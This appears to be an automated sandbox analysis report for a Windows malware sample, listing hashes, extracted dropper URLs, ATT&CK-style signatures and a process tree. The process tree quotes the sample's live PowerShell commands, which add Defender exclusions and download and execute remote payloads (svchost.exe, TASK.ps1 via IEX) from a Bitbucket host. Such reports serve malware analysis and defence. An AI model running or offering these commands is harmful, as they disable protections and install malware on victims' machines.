Analysis

  • max time kernel
    78s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-09-2024 18:52

General

  • Target

    ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe

  • Size

    147KB

  • MD5

    ee38e40d13cfee4d0fb24624c152fb48

  • SHA1

    55d903926d63c0a2db44774d15b137af2b4483be

  • SHA256

    242fd2d6c72a0a3cfe8f767465e30d94d70e2d094277ad3d6be99336af625480

  • SHA512

    8b8d85f2335b2d3b247226583a4f7a717b65cb740c4fbe9fce093b15b23c43da1d1271943d8c48bf567cea806735f91e89928b8cd9f5abbf6d84626e83fbe8f1

  • SSDEEP

    3072:5jFRQGCIIm1xs5GWp1icKAArDZz4N9GhbkrNEk1AgZ:dQGCIImOp0yN90QEE

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper
    https://bitbucket.org/dazlle/logos/downloads/svchost.exe

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    https://bitbucket.org/dazlle/logos/downloads/TASK.ps1

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c test10.bat
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1468
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2704
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\Temp"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2732
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2780
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension ".reg"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2740
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/dazlle/logos/downloads/svchost.exe','C:\Users\Admin\AppData\Local\Temp\svchost.exe'); cmd /c 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2344
      • C:\wiNDowS\SysWOW64\windowsPowerShell\v1.0\powershell.exe
        C:\wiNDowS\System32\windowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString('https://bitbucket.org/dazlle/logos/downloads/TASK.ps1');IEX $wcli
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:944

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\test10.bat

    Filesize

    1KB

    MD5

    538dc74b9937f71bf6e20cf5cda70cd4

    SHA1

    258839f75b2eb0978e7566e123557d710d9b264a

    SHA256

    1c8c62d29c1f9f3ed790caa38cc693b6d94a75dac037fc857211028d85942b70

    SHA512

    95d7fd78aa93986c0909e27ead1fc8cfb6a7bccd3f33221f67ae2039966fee6531e3e6dc0d2f795dc46525f279d5d975ee12452e77eb85d52ee20e0b5fa35c23

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    fad196647bc831b8f74510d602689fd3

    SHA1

    a121ad247da28cea5316c307ce5cd4bccb35ad3b

    SHA256

    f6919a4200f4d6640b423326617425c13a1acbd617a18f9747fee7d1a258aa36

    SHA512

    4ee9dc83b3ad822b6c6d2f23beaed4d1a5556027f9612b161f7c1b9ea778aec67110b5e5926a739ee7c9692ddea9c0cd17ccc0dfd524e1e77e5ccef2ebe6c631